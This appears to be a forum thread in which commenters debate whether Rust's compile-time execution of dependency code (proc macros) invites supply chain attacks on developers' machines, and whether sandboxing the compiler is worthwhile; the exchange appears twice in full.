They download and execute code at compile time. If a dependency of a dependency of a dependency gets hacked and inserts bad code into their crate, developers around the world will get infected. It’s like curl2bash from a bunch of random sources every time you hit compile.
Infection has already happened a few times in NodeJS world and the general consensus was “this wasn’t as bad as it could’ve been” and “we should probably add 2FA to publishing accounts”. There are a few niche NodeJS alternatives that sandbox the npm install process, but they’re far from the mainstream.
With Rust dependency trees looking more and more like Javascript’s, I think it’s only a matter of time before a big crate like serde or reqwest will get infected by a supply chain attack and tens of millions of bitcoin will get stolen from developers’ machines.
It would be so easy for a desperate dev with a gambling debt and a small side project that major companies are leaning on to fall victim to extortion, and this risk is embedded in almost every programming language. It’s not just a Rust problem, and very few people are working on a solution right now (including the Rust devs, luckily!)
I don’t think this is a problem with proc macros or package managers. This is just a regular supply chain attack, no?
The way I understand it, sandboxing would be detrimental to code performance. Imagine coding a messaging system with a serve struct, only for serde code to be much slower due to sandboxing. For release version it could be suggested to disable sandboxingy but then we would have gained practically nothing.
In security terms, being prepared for incidents is most often better than trying to prevent them. I think this applies here too, and cargo helps here. It can automatically update your packages, which can be used to patch attacks like this out.
If you think I’m wrong, please don’t hesitate to tell me!
“Normal” supply chain attacks would infect the executable being built, targeting your customers, while this attacks the local dev machine. For example, the malware that got inserted into a pirated copy of XCode infected tons of Chinese iPhone apps, but didn’t do much on the devs’ machines.
Sandboxing wouldn’t necessarily lead to detrimental performance. It should be quite feasible to use sandboxing APIs (like the ones Docker uses) to restrict the compiler while proc macros are being processed. On operating systems where tight sandboxing APIs aren’t available this is a bigger challenge, but steps definitely can be taken to mitigate the problem in some scenarios.
In terms of security you should of course assume that you’ve been hacked (or that you will be hacked), but that doesn’t mean you should make it easier. You don’t disable your antivirus because hackers are inevitable and you don’t run your entire OS in ring 0 because kernel exploits will always be found anyway; there are ways to slow hackers down, and we should use them whenever possible. Sandboxing risky compiler operations is just one link in a long chain of security measures.
They download and execute code at compile time. If a dependency of a dependency of a dependency gets hacked and inserts bad code into their crate, developers around the world will get infected. It’s like curl2bash from a bunch of random sources every time you hit compile.
Infection has already happened a few times in NodeJS world and the general consensus was “this wasn’t as bad as it could’ve been” and “we should probably add 2FA to publishing accounts”. There are a few niche NodeJS alternatives that sandbox the npm install process, but they’re far from the mainstream.
With Rust dependency trees looking more and more like Javascript’s, I think it’s only a matter of time before a big crate like serde or reqwest will get infected by a supply chain attack and tens of millions of bitcoin will get stolen from developers’ machines.
It would be so easy for a desperate dev with a gambling debt and a small side project that major companies are leaning on to fall victim to extortion, and this risk is embedded in almost every programming language. It’s not just a Rust problem, and very few people are working on a solution right now (including the Rust devs, luckily!)
I don’t think this is a problem with proc macros or package managers. This is just a regular supply chain attack, no?
The way I understand it, sandboxing would be detrimental to code performance. Imagine coding a messaging system with a serve struct, only for serde code to be much slower due to sandboxing. For release version it could be suggested to disable sandboxingy but then we would have gained practically nothing.
In security terms, being prepared for incidents is most often better than trying to prevent them. I think this applies here too, and cargo helps here. It can automatically update your packages, which can be used to patch attacks like this out.
If you think I’m wrong, please don’t hesitate to tell me!
“Normal” supply chain attacks would infect the executable being built, targeting your customers, while this attacks the local dev machine. For example, the malware that got inserted into a pirated copy of XCode infected tons of Chinese iPhone apps, but didn’t do much on the devs’ machines.
Sandboxing wouldn’t necessarily lead to detrimental performance. It should be quite feasible to use sandboxing APIs (like the ones Docker uses) to restrict the compiler while proc macros are being processed. On operating systems where tight sandboxing APIs aren’t available this is a bigger challenge, but steps definitely can be taken to mitigate the problem in some scenarios.
In terms of security you should of course assume that you’ve been hacked (or that you will be hacked), but that doesn’t mean you should make it easier. You don’t disable your antivirus because hackers are inevitable and you don’t run your entire OS in ring 0 because kernel exploits will always be found anyway; there are ways to slow hackers down, and we should use them whenever possible. Sandboxing risky compiler operations is just one link in a long chain of security measures.